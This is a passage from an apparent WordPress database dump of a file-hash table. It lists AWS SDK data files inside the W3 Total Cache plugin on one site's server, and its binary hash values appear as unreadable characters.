Q0Er','boOKu{-4MfNsDu','',0,'?'),('cV-Xˠ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appconfig/2019-10-09/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appconfig/2019-10-09/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','񠳪c( @So','g`]Y',']J`Nܠ& ߝj&^<+E','',0,'?'),('j|\n618h#','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appintegrations/2020-07-29/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appintegrations/2020-07-29/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VzЕ8.z','hTрQVI\\,&.~v','',0,'?'),('Jq ́Dn\"H','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/application-autoscaling/2016-02-06/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/application-autoscaling/2016-02-06/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ȃ~c^',' QsBJ!0 AES w[E','',0,'?'),('gx@!Lm','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/application-autoscaling/2016-02-06/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/application-autoscaling/2016-02-06/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lmY9bS$ӽڨu','',0,'?'),('Pbx L+','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appmesh/2019-01-25/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appmesh/2019-01-25/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G8纝٠7p\"','v2QR G>/V`C<4Z','',0,'?'),(':>)|','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/apprunner/2020-05-15/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/apprunner/2020-05-15/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k_<i+ɇ#w','E˸bVbⱜ;_]\r@8wXP1Rj','',0,'?'),('LLFP+','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/apprunner/2020-05-15/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/apprunner/2020-05-15/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':tQv,tO\n','\r f9k\\:1xzT^β_\\|OW','',0,'?'),('1ra@``7','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appstream/2016-12-01/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appstream/2016-12-01/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r`OĒ+tYm','fqAo8<[#y?O^u**} ','',0,'?'),('U`Ηᖬ)8w','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appstream/2016-12-01/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appstream/2016-12-01/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&% kU S','sFa\nԀ ̩`bMhj||','',0,'?'),('Z}\0}=\"9W\Z','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appstream/2016-12-01/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appstream/2016-12-01/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ì2\Z','Ropr4v\Z)s\Z~','',0,'?'),('F,}gk5t','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appstream/2016-12-01/waiters-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appstream/2016-12-01/waiters-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','̹>ߛp\Z_','Hˊ\\,ܧ^!Ij >3D8','',0,'?'),('X>] wZ1','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appsync/2017-07-25/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appsync/2017-07-25/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A\'099','\0Мic .uB8A','',0,'?'),('8F&c B7w_;','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appsync/2017-07-25/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/appsync/2017-07-25/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xXOz\"W6','yva Q9o)< `{VX','',0,'?'),('uB,','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/athena/2017-05-18/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/athena/2017-05-18/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ۣB\\,2~','缾crP2.hSkռ^','',0,'?'),('tt=>pAkE_','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/athena/2017-05-18/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/athena/2017-05-18/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B!*!33g|\ZE','~@yp Uc— 784\0','',0,'?'),('\n`^\ntQ~$?6,','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/athena/2017-05-18/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/athena/2017-05-18/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' bQ)*#','l|=!bh2R@MA','',0,'?'),('[\\ƘYfos','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/auditmanager/2017-07-25/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/auditmanager/2017-07-25/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Zsp.9XB','cyqhEOzx^YkoOn','',0,'?'),('7y~u.XLEj','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/autoscaling/2011-01-01/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/autoscaling/2011-01-01/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' f]QE\'\'','3t9thKaǰV|mF|r','',0,'?'),('\0`i\ZrW','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/autoscaling/2011-01-01/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/autoscaling/2011-01-01/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H1Ju|E`\\3','Ip!byG޶Uڗ','',0,'?'),('\0K2BAow+QS','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/autoscaling/2011-01-01/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/autoscaling/2011-01-01/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\sh8I&XW','RNO5-mkJ8/,{PEC[^M','',0,'?'),('c4{thB;R]','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/autoscaling/2011-01-01/waiters-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/autoscaling/2011-01-01/waiters-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ekia.j\"$]','çwDb2|D7֪{L',']զSd6@M 3i','',0,'?'),('ۛd!qHp3','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/backup/2018-11-15/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/backup/2018-11-15/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*qB-|kr','>6\ZL\0UَI쥵e?Y$T','',0,'?'),('&5U','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/backup/2018-11-15/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/backup/2018-11-15/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q߯ô0&U؇','9/u_h~,1(TFC\nA','',0,'?'),('fV`~zt*EySCe','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/batch/2016-08-10/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/batch/2016-08-10/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.,#60\ZUnZ6ԓ','l\"vflўQw^ѠRږ:fQ','',0,'?'),('E9WIge92','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/batch/2016-08-10/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/batch/2016-08-10/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','= 7`M','C$[(em.U93|\nOّ2','',0,'?'),('ڔ>T\\P5','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/batch/2016-08-10/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/batch/2016-08-10/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')kA?*ы','&m?[M2_LMi@MlٕEs','',0,'?'),('ԩ;T','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/braket/2019-09-01/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/braket/2019-09-01/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qu[Dt\ZJE7*','aϥ< gZ+V_@1N[p:B','',0,'?'),('cf-HP','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/braket/2019-09-01/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/braket/2019-09-01/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2\'cϋG|_','zܵ.\">_\"p\ZYrg\rCYD\'{','',0,'?'),('ղh$3ʾpQhz','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/budgets/2016-10-20/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/budgets/2016-10-20/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Os˗;ȬExz7','\nA_\ndS-c0K;쓽OiWh','',0,'?'),('..&O[)KP','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/budgets/2016-10-20/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/budgets/2016-10-20/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Nn\rTdUz','V -XH4-P','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ce/2017-10-25/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ce/2017-10-25/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3ٕHrٮ?!ؤ','\0;1C4c-bAל','',0,'?'),('l\nٓ;4St','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/chime/2018-05-01/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/chime/2018-05-01/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tah\"g8','Kh.(gDB!fk=ey','',0,'?'),('YlcgqW','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/chime/2018-05-01/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/chime/2018-05-01/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YwJb\ZWJEC','YG ۷Y)y8*TG','',0,'?'),('̨#myG z','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloud9/2017-09-23/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloud9/2017-09-23/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-)\0uЍ`^','\"I2S} ]\Zy~̪һ ','',0,'?'),('ܪqcn{cY','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloud9/2017-09-23/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloud9/2017-09-23/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dR@ >3y','[YpFWUI jx8HԻ','',0,'?'),('[^FHGLx','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/clouddirectory/2016-05-10/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/clouddirectory/2016-05-10/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IS輑M +\'','1\ZwuZ','',0,'?'),('uZٽ·\Z','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudformation/2010-05-15/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudformation/2010-05-15/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','鞹9\ZFN','֯Ms8& wGGؽݾk@Wq','',0,'?'),('gXwyk;.!5','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudformation/2010-05-15/waiters-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudformation/2010-05-15/waiters-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~ULo=','RZ7OM qR\"J{Avb?ώ','',0,'?'),('K\"ݒh+o;i','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2015-07-27/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2015-07-27/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E$b4%hQ׎yǮ','ta-R){eg}@5L`,','',0,'?'),('C!Dˢ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2015-07-27/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2015-07-27/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mYdRYn','{\02\n9-5ftA{csLQ&','',0,'?'),('<`,o PM>qn','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2015-07-27/waiters-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2015-07-27/waiters-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4X+\Z*','K)-*w=-]lL489j!w','',0,'?'),(' ƫh 39','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-01-28/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-01-28/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7uVP\0','-7ՙ+K9.y\\eAsɃ','',0,'?'),('xq7JN','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-01-28/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-01-28/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>].樎x? {','&9].0㟾t_(&ު:\'+','',0,'?'),('\Z è!_','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-01-28/waiters-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-01-28/waiters-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lǣ>xxv;','E[0=O\r-)\rR 95@H','',0,'?'),('`r\Zwi M','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-08-01/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-08-01/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I7ğekIX`','KF#)~ c{Y@t3^4(','',0,'?'),('V4;݂v','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-08-01/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-08-01/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yDp [qr3?4[','G:gX\rbYHx\rA=ř','',0,'?'),(' g\\l>Shm_ ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-08-01/waiters-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-08-01/waiters-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@<;am','Ғ=GUrc΢ \0$k:og','',0,'?'),('ϧm>@0po%X+X','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-08-20/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-08-20/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&sg=Y`','-u]r Mbk@kadPp\0','',0,'?'),('Lv=x}','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-08-20/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-08-20/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qzdjr~=h','/n2KXWooUmޙ','',0,'?'),('\"/#,\'8{','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-08-20/waiters-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-08-20/waiters-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q9:5-','λp-Yd#|','',0,'?'),('!=>gQ*','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-09-07/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-09-07/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*jFz.pRF','iW=lM6Ź+7 :d ','',0,'?'),('hZ\'ui','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-09-07/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-09-07/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D Ows','&bOVA8$o 8I=` ','',0,'?'),('3I\0ByHuo','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-09-07/waiters-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-09-07/waiters-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'}qc','Ny\\I6Sg%v{(','',0,'?'),('O),]\"#iN','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-09-07/waiters-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-09-07/waiters-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EIz\Z׵$Ȉ]a','rI.̻#uas(\"(','',0,'?'),('U@+64\nN','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-09-29/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-09-29/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M͟m ','K_5d ?3R)9 \"J','',0,'?'),(' \nh\n','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-09-29/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-09-29/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5qݜڳ~<`','jHtqY>c,J,\0','',0,'?'),('%3v_^].r\\','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-09-29/waiters-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-09-29/waiters-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/j|wXq`;u','O0d0ꪞIO\no\ZQ^%nZ','',0,'?'),('Te_O@D','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-09-29/waiters-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-09-29/waiters-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SLj\ro݅zu','\nSS:,ޟŰ \0tጩN ','',0,'?'),('bSp~;^\0wE','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-11-25/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-11-25/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3uC R1Ͻ^ [','CHx\'\\_Ķ z\0%$n\0bL','',0,'?'),('.߄P*10fy7','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-11-25/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-11-25/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Dr˔Ñ)','K pz1yոLUAOcOQN D','',0,'?'),('T%Dw','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-11-25/waiters-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-11-25/waiters-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ;⑌Onz*-','9We I?UOG|@a4u','',0,'?'),('FLIA쨶$,','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-11-25/waiters-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2016-11-25/waiters-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t\Z;\\ߌ½$\"',':eY$zVZl4sd \'+D','',0,'?'),('~A|,|vA\'','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2017-03-25/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2017-03-25/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WxA3Jq16wIXKK\r','',0,'?'),('KPvI-;[ \n','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2017-03-25/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2017-03-25/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~Wt7\\','  Kܖm_UʼnG','',0,'?'),('*E bs \Z','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2017-03-25/waiters-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2017-03-25/waiters-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Shgd\n','P9M O>b5L`qLb','',0,'?'),('}f>sxWB*)','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2017-03-25/waiters-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2017-03-25/waiters-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','LA/CFЖ,~','%aF6\" ˋ;+\nbHd ','',0,'?'),('4uҹ YLmQ#','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2017-10-30/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2017-10-30/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P<5\'%(o\"w','SǑ4Y`b6;$j=0\0>.','',0,'?'),('pf.%F;$\nR3','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2017-10-30/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2017-10-30/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','켫Kz&E?I','3ߊ#sZ1/6%Awӎ','',0,'?'),('U.I`=;YP','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2017-10-30/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2017-10-30/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˝]8&m)_M','ytV1;PinɝMo\02','',0,'?'),('g&ˉX\ni','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2017-10-30/waiters-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/cloudfront/2017-10-30/waiters-1.json.php',1,'\